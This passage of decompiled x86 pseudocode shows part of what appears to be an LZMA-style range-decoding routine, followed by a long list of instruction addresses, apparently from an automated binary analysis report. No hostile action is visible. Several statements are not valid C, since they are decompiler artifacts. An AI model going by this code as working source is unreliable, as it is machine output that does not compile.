							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407175
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00000000
                                                                                    0x0040743e
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x004070bf
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x00000000
                                                                                    0x004075f6
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x00000000
                                                                                    0x004073c8
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00000000
                                                                                    0x0040753b
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
